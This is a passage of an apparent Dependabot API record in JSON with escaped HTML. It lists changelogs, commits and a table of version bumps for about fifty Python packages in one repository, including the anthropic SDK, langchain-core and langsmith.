href=\"https://github.com/anthropics/anthropic-sdk-python/blob/main/CHANGELOG.md\"\u003eanthropic's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.107.1 (2026-06-07)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.107.0...v0.107.1\"\u003ev0.107.0...v0.107.1\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003efoundry:\u003c/strong\u003e send x-api-key header for API-key auth (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/62\"\u003e#62\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/13381413d22ad14d85e66836c67cc8a13bd2b7bd\"\u003e1338141\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.107.0 (2026-06-06)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.106.0...v0.107.0\"\u003ev0.106.0...v0.107.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e small updates to Managed Agents types (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/72923f986f808597f86482a7eae4fba9a791e6ae\"\u003e72923f9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.106.0 (2026-06-05)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.2...v0.106.0\"\u003ev0.105.2...v0.106.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eapi:\u003c/strong\u003e mark Claude Opus 4.1 as deprecated (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/85068cc4cb42feecb80a378942cec71e1baa8dcf\"\u003e85068cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eclient:\u003c/strong\u003e make Foundry client copy() and with_options() work (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/94146acdc1c6f66f187d5a42e4afbb911e692fe8\"\u003e94146ac\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etransform schema:\u003c/strong\u003e preserve $defs when schema root is a $ref (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/1642\"\u003e#1642\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/fc58e06b78407b447c50dfea109c6fb300f4b97d\"\u003efc58e06\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix artifact url (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a6ed0c4124d29989a568a27293dadf66e7ebcd6f\"\u003ea6ed0c4\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e fix branch names (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3b0337074f0bbab47bf7f5a2b76b4d240cff719a\"\u003e3b03370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003einternal:\u003c/strong\u003e update private repo name (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/7dbcb05706f1865afeee62fb06e400f5c4bf619e\"\u003e7dbcb05\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epoint security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e) (\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/80f2c97b8e9534f9879945de11c11aba00cf8704\"\u003e80f2c97\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.105.2 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.1...v0.105.2\"\u003ev0.105.1...v0.105.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e0.105.1 (2026-05-29)\u003c/h2\u003e\n\u003cp\u003eFull Changelog: \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.105.0...v0.105.1\"\u003ev0.105.0...v0.105.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/260e687082dfe2d9b7f20199dc8ab7c9e90ae1de\"\u003e\u003ccode\u003e260e687\u003c/code\u003e\u003c/a\u003e release: 0.107.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/49c5395b93f5f38a299b88228964b8267394b9d1\"\u003e\u003ccode\u003e49c5395\u003c/code\u003e\u003c/a\u003e fix(foundry): send x-api-key header for API-key auth (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/62\"\u003e#62\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/4ceca722bedbd923671365f1a36f86d09fbec657\"\u003e\u003ccode\u003e4ceca72\u003c/code\u003e\u003c/a\u003e release: 0.107.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/3a6f9d9c217bdb504ddd229618149ab7e8033ad3\"\u003e\u003ccode\u003e3a6f9d9\u003c/code\u003e\u003c/a\u003e feat(api): small updates to Managed Agents types\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/6a70c9f72b16b04348564c5b92961a82ebe4b7da\"\u003e\u003ccode\u003e6a70c9f\u003c/code\u003e\u003c/a\u003e release: 0.106.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/8fa41c8acf6885fd8b7a0a67f705bbb9d3058672\"\u003e\u003ccode\u003e8fa41c8\u003c/code\u003e\u003c/a\u003e codegen metadata\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/1f553254640b45aecef37df0000da68dc2bcb9c5\"\u003e\u003ccode\u003e1f55325\u003c/code\u003e\u003c/a\u003e Don't leak ANTHROPIC_API_KEY to the Foundry endpoint (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/18\"\u003e#18\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/a94498c6aa3dd4e237ed72dacdd26336bbd7d9fc\"\u003e\u003ccode\u003ea94498c\u003c/code\u003e\u003c/a\u003e fix(client): make Foundry client copy() and with_options() work\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/907d849f8dfec50dfeda06b5cdde0ee268f9b7f9\"\u003e\u003ccode\u003e907d849\u003c/code\u003e\u003c/a\u003e chore(internal): fix artifact url\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/commit/9676a5d0d40162a385001f60aa136f97b2718309\"\u003e\u003ccode\u003e9676a5d\u003c/code\u003e\u003c/a\u003e docs: point security reports to Anthropic's HackerOne program (\u003ca href=\"https://redirect.github.com/anthropics/anthropic-sdk-python/issues/10\"\u003e#10\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/anthropics/anthropic-sdk-python/compare/v0.96.0...v0.107.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langchain-core` from 1.4.0 to 1.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain/releases\"\u003elangchain-core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain-core==1.4.1\u003c/h2\u003e\n\u003cp\u003eChanges since langchain-core==1.4.0\u003c/p\u003e\n\u003cp\u003erelease(core): 1.4.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37922\"\u003e#37922\u003c/a\u003e)\nfix(core): remove Bedrock prevalidation from \u003ccode\u003eload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37909\"\u003e#37909\u003c/a\u003e)\ndocs(core): expand and link \u003ccode\u003eModelProfile\u003c/code\u003e docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37904\"\u003e#37904\u003c/a\u003e)\nrelease(anthropic): 1.4.4 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37757\"\u003e#37757\u003c/a\u003e)\nchore(core): bump \u003ccode\u003euuid-utils\u003c/code\u003e to 0.16.0 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37699\"\u003e#37699\u003c/a\u003e)\nchore(infra): bump \u003ccode\u003elangchain-tests\u003c/code\u003e floor to 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37610\"\u003e#37610\u003c/a\u003e)\nrelease(standard-tests): 1.1.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37609\"\u003e#37609\u003c/a\u003e)\nchore: bump idna from 3.11 to 3.15 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37539\"\u003e#37539\u003c/a\u003e)\nci(infra): harden Dependabot version-bound preservation (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37510\"\u003e#37510\u003c/a\u003e)\nhotfix: bump lockfiles (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37508\"\u003e#37508\u003c/a\u003e)\ndocs(core): note override for \u003ccode\u003e_get_ls_params\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37503\"\u003e#37503\u003c/a\u003e)\nchore(core,langchain,openai): refresh stale OpenAI model references (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37487\"\u003e#37487\u003c/a\u003e)\nchore: bump langsmith from 0.7.31 to 0.8.0 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37395\"\u003e#37395\u003c/a\u003e)\nfix(core): accept \u003ccode\u003eSerializable\u003c/code\u003e constructor-envelope wire shape in \u003ccode\u003e_convert_to_message\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37456\"\u003e#37456\u003c/a\u003e)\nfix(core): preserve chunk \u003ccode\u003eadditional_kwargs\u003c/code\u003e across v3 stream assembly (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37435\"\u003e#37435\u003c/a\u003e)\nfix(core): preserve reasoning blocks alongside tool_call in v3 stream (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37434\"\u003e#37434\u003c/a\u003e)\nchore: bump jupyter-server from 2.17.0 to 2.18.0 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37354\"\u003e#37354\u003c/a\u003e)\nchore: bump mistune from 3.1.4 to 3.2.1 in /libs/core (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37353\"\u003e#37353\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/a401351e12b9a3e1670314adf2f7bbcf8811903c\"\u003e\u003ccode\u003ea401351\u003c/code\u003e\u003c/a\u003e release(core): 1.4.1 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37922\"\u003e#37922\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/053c368ba438ca077f1348147fadc5dad16d6898\"\u003e\u003ccode\u003e053c368\u003c/code\u003e\u003c/a\u003e fix(core): remove Bedrock prevalidation from \u003ccode\u003eload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37909\"\u003e#37909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/0993edba86014788827144c175499755ec5b9f55\"\u003e\u003ccode\u003e0993edb\u003c/code\u003e\u003c/a\u003e chore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37916\"\u003e#37916\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/6f7c8f54454ae45b07ca274cbfbb0afb8cef9041\"\u003e\u003ccode\u003e6f7c8f5\u003c/code\u003e\u003c/a\u003e chore: bump starlette from 0.49.1 to 1.0.1 in /libs/langchain (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37899\"\u003e#37899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/586bcd46a17be1eafc61127460d766b2a0611db3\"\u003e\u003ccode\u003e586bcd4\u003c/code\u003e\u003c/a\u003e docs(core): expand and link \u003ccode\u003eModelProfile\u003c/code\u003e docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37904\"\u003e#37904\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/9eab5237ccf7878648b2d33108a7f7e15331c452\"\u003e\u003ccode\u003e9eab523\u003c/code\u003e\u003c/a\u003e chore: bump requests from 2.34.0 to 2.34.2 in /libs/partners/xai (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37903\"\u003e#37903\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/be2e8f70bc472354f23e9f62519427dd2de7d332\"\u003e\u003ccode\u003ebe2e8f7\u003c/code\u003e\u003c/a\u003e ci(infra): add \u003ccode\u003eexclude\u003c/code\u003e input to skip libs in scheduled integration tests (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/3b999176c84c1236e1f6fbaa5194782360e82264\"\u003e\u003ccode\u003e3b99917\u003c/code\u003e\u003c/a\u003e test(langchain,partners): disable pytest-benchmark under xdist to silence `Py...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/34af59c1a69c403d7b34d0bbd9ceffd287e3b0ed\"\u003e\u003ccode\u003e34af59c\u003c/code\u003e\u003c/a\u003e fix(partners): cap aiohttp below 3.14 for vcrpy compat (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37898\"\u003e#37898\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/langchain-ai/langchain/commit/414d7b8e94fca5102e87a1f7a6c70e32622a85b9\"\u003e\u003ccode\u003e414d7b8\u003c/code\u003e\u003c/a\u003e chore(model-profiles): refresh model profile data (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37895\"\u003e#37895\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/langchain-ai/langchain/compare/langchain-core==1.4.0...langchain-core==1.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `langsmith` from 0.8.4 to 0.8.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langsmith-sdk/releases\"\u003elangsmith's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.9\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat(sandbox): add JS Dockerfile snapshots by \u003ca href=\"https://github.com/langchain-infra\"\u003e\u003ccode\u003e@​langchain-infra\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2951\"\u003elangchain-ai/langsmith-sdk#2951\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump the js-minor-and-patch group across 1 directory with 11 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2931\"\u003elangchain-ai/langsmith-sdk#2931\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump websockets from 15.0.1 to 16.0 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2811\"\u003elangchain-ai/langsmith-sdk#2811\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): update myst-parser requirement from \u0026gt;=3 to \u0026gt;=4.0.1 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2841\"\u003elangchain-ai/langsmith-sdk#2841\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump the py-minor-and-patch group across 1 directory with 19 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2934\"\u003elangchain-ai/langsmith-sdk#2934\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps): bump typescript from 5.9.3 to 6.0.3 in /js by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2839\"\u003elangchain-ai/langsmith-sdk#2839\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump google-adk from 1.10.0 to 2.1.0 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2960\"\u003elangchain-ai/langsmith-sdk#2960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump wrapt from 1.17.3 to 2.2.1 in /python by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2961\"\u003elangchain-ai/langsmith-sdk#2961\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump the py-minor-and-patch group in /python with 6 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/langchain-ai/langsmith-sdk/pull/2958\"\u003elangchain-ai/langsmith-sdk#2958\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(deps-dev): bump ...\n\n_Description has been truncated_","html_url":"https://github.com/anulum/director-ai/pull/87","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/anulum%2Fdirector-ai/issues/87","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/87/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-07T11:09:48.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4607089172","node_id":"PR_kwDORQ8Eq87jnIhL","number":77,"state":"closed","title":"chore(deps): bump the python-minor-patch group with 50 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":5,"pull_request":true,"closed_at":"2026-06-07T22:06:57.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-07T11:09:48.000Z","updated_at":"2026-06-07T22:08:20.000Z","time_to_close":39429,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"python-minor-patch","update_count":50,"packages":[{"name":"numpy","old_version":"2.4.4","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"torch","old_version":"2.11.0","new_version":"2.12.0","repository_url":"https://github.com/pytorch/pytorch"},{"name":"transformers","old_version":"5.7.0","new_version":"5.10.2","repository_url":"https://github.com/huggingface/transformers"},{"name":"sentence-transformers","old_version":"5.4.1","new_version":"5.5.1","repository_url":"https://github.com/huggingface/sentence-transformers"},{"name":"openai","old_version":"2.32.0","new_version":"2.41.0","repository_url":"https://github.com/openai/openai-python"},{"name":"anthropic","old_version":"0.96.0","new_version":"0.107.0","repository_url":"https://github.com/anthropics/anthropic-sdk-python"},{"name":"langchain-core","old_version":"1.4.0","new_version":"1.4.1","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langsmith","old_version":"0.8.4","new_version":"0.8.9","repository_url":"https://github.com/langchain-ai/langsmith-sdk"},{"name":"llama-index-core","old_version":"0.14.20","new_version":"0.14.22","repository_url":"https://github.com/run-llama/llama_index"},{"name":"fastapi","old_version":"0.136.0","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"pydantic","old_version":"2.13.1","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"python-multipart","old_version":"0.0.28","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"elevenlabs","old_version":"2.43.0","new_version":"2.51.0","repository_url":"https://github.com/elevenlabs/elevenlabs-python"},{"name":"onnxruntime","old_version":"1.22.0","new_version":"1.26.0","repository_url":"https://github.com/microsoft/onnxruntime"},{"name":"onnxruntime-gpu","old_version":"1.24.4","new_version":"1.26.0","repository_url":"https://github.com/microsoft/onnxruntime"},{"name":"grpcio","old_version":"1.78.0","new_version":"1.81.0","repository_url":"https://github.com/grpc/grpc"},{"name":"grpcio-tools","old_version":"1.78.0","new_version":"1.81.0","repository_url":"https://github.com/grpc/grpc"},{"name":"mujoco","old_version":"3.8.0","new_version":"3.9.0","repository_url":"https://github.com/google-deepmind/mujoco"},{"name":"scikit-learn","old_version":"1.6.1","new_version":"1.9.0","repository_url":"https://github.com/scikit-learn/scikit-learn"},{"name":"weaviate-client","old_version":"4.20.5","new_version":"4.16.2","repository_url":"https://github.com/weaviate/weaviate-python-client"},{"name":"qdrant-client","old_version":"1.17.1","new_version":"1.18.0","repository_url":"https://github.com/qdrant/qdrant-client"},{"name":"faiss-cpu","old_version":"1.13.2","new_version":"1.14.2","repository_url":"https://github.com/facebookresearch/faiss"},{"name":"polar-sdk","old_version":"0.31.3","new_version":"0.31.5","repository_url":"https://github.com/polarsource/polar-python"},{"name":"langgraph","old_version":"1.1.6","new_version":"1.2.4","repository_url":"https://github.com/langchain-ai/langgraph"},{"name":"haystack-ai","old_version":"2.27.0","new_version":"2.30.0","repository_url":"https://github.com/deepset-ai/haystack"},{"name":"litellm","old_version":"1.86.2","new_version":"1.88.0","repository_url":"https://github.com/BerriAI/litellm"},{"name":"mkdocs-jupyter","old_version":"0.26.2","new_version":"0.26.3","repository_url":"https://github.com/danielfrg/mkdocs-jupyter"},{"name":"opentelemetry-api","old_version":"1.41.0","new_version":"1.42.1","repository_url":"https://github.com/open-telemetry/opentelemetry-python"},{"name":"langfuse","old_version":"4.3.1","new_version":"4.7.1","repository_url":"https://github.com/langfuse/langfuse"},{"name":"gradio","old_version":"6.13.0","new_version":"6.16.0","repository_url":"https://github.com/gradio-app/gradio"},{"name":"pypdf","old_version":"6.10.2","new_version":"6.13.0","repository_url":"https://github.com/py-pdf/pypdf"},{"name":"boto3","old_version":"1.42.90","new_version":"1.43.24","repository_url":"https://github.com/boto/boto3"},{"name":"notion-client","old_version":"3.0.0","new_version":"3.1.0","repository_url":"https://github.com/ramnes/notion-sdk-py"},{"name":"google-api-python-client","old_version":"2.194.0","new_version":"2.197.0","repository_url":"https://github.com/googleapis/google-api-python-client"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"psycopg2-binary","old_version":"2.9.11","new_version":"2.9.12","repository_url":"https://github.com/psycopg/psycopg2"},{"name":"google-cloud-aiplatform","old_version":"1.149.0","new_version":"1.156.0","repository_url":"https://github.com/googleapis/python-aiplatform"},{"name":"hypothesis","old_version":"6.151.10","new_version":"6.155.2","repository_url":"https://github.com/HypothesisWorks/hypothesis"},{"name":"pytest-asyncio","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/pytest-dev/pytest-asyncio"},{"name":"ruff","old_version":"0.15.11","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"},{"name":"build","old_version":"1.4.3","new_version":"1.5.0","repository_url":"https://github.com/pypa/build"},{"name":"aiohappyeyeballs","old_version":"2.6.1","new_version":"2.6.2","repository_url":"https://github.com/aio-libs/aiohappyeyeballs"},{"name":"anyio","old_version":"4.12.1","new_version":"4.13.0","repository_url":"https://github.com/agronholm/anyio"},{"name":"certifi","old_version":"2026.2.25","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"huggingface-hub","old_version":"1.12.0","new_version":"1.18.0","repository_url":"https://github.com/huggingface/huggingface_hub"},{"name":"idna","old_version":"3.15","new_version":"3.18","repository_url":"https://github.com/kjd/idna"},{"name":"propcache","old_version":"0.4.1","new_version":"0.5.2","repository_url":"https://github.com/aio-libs/propcache"},{"name":"discord-py","old_version":"2.5.2","new_version":"2.7.1","repository_url":"https://github.com/Rapptz/discord.py"}],"path":null,"ecosystem":"pip"},"body":"Bumps the python-minor-patch group with 50 updates:\n\n| Package | From | To |\n| --- | --- | --- |\n| [numpy](https://github.com/numpy/numpy) | `2.4.4` | `2.4.6` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [torch](https://github.com/pytorch/pytorch) | `2.11.0` | `2.12.0` |\n| [transformers](https://github.com/huggingface/transformers) | `5.7.0` | `5.10.2` |\n| [sentence-transformers](https://github.com/huggingface/sentence-transformers) | `5.4.1` | `5.5.1` |\n| [openai](https://github.com/openai/openai-python) | `2.32.0` | `2.41.0` |\n| [anthropic](https://github.com/anthropics/anthropic-sdk-python) | `0.96.0` | `0.107.0` |\n| [langchain-core](https://github.com/langchain-ai/langchain) | `1.4.0` | `1.4.1` |\n| [langsmith](https://github.com/langchain-ai/langsmith-sdk) | `0.8.4` | `0.8.9` |\n| [llama-index-core](https://github.com/run-llama/llama_index) | `0.14.20` | `0.14.22` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.136.0` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.49.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.13.1` | `2.13.4` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.28` | `0.0.32` |\n| [elevenlabs](https://github.com/elevenlabs/elevenlabs-python) | `2.43.0` | `2.51.0` |\n| [onnxruntime](https://github.com/microsoft/onnxruntime) | `1.22.0` | `1.26.0` |\n| [onnxruntime-gpu](https://github.com/microsoft/onnxruntime) | `1.24.4` | `1.26.0` |\n| [grpcio](https://github.com/grpc/grpc) | `1.78.0` | `1.81.0` |\n| [grpcio-tools](https://github.com/grpc/grpc) | `1.78.0` | `1.81.0` |\n| [mujoco](https://github.com/google-deepmind/mujoco) | `3.8.0` | `3.9.0` |\n| [scikit-learn](https://github.com/scikit-learn/scikit-learn) | `1.6.1` | `1.9.0` |\n| [weaviate-client](https://github.com/weaviate/weaviate-python-client) | `4.20.5` | `4.16.2` |\n| [qdrant-client](https://github.com/qdrant/qdrant-client) | `1.17.1` | `1.18.0` |\n| [faiss-cpu](https://github.com/facebookresearch/faiss) | `1.13.2` | `1.14.2` |\n| [polar-sdk](https://github.com/polarsource/polar-python) | `0.31.3` | `0.31.5` |\n| [langgraph](https://github.com/langchain-ai/langgraph) | 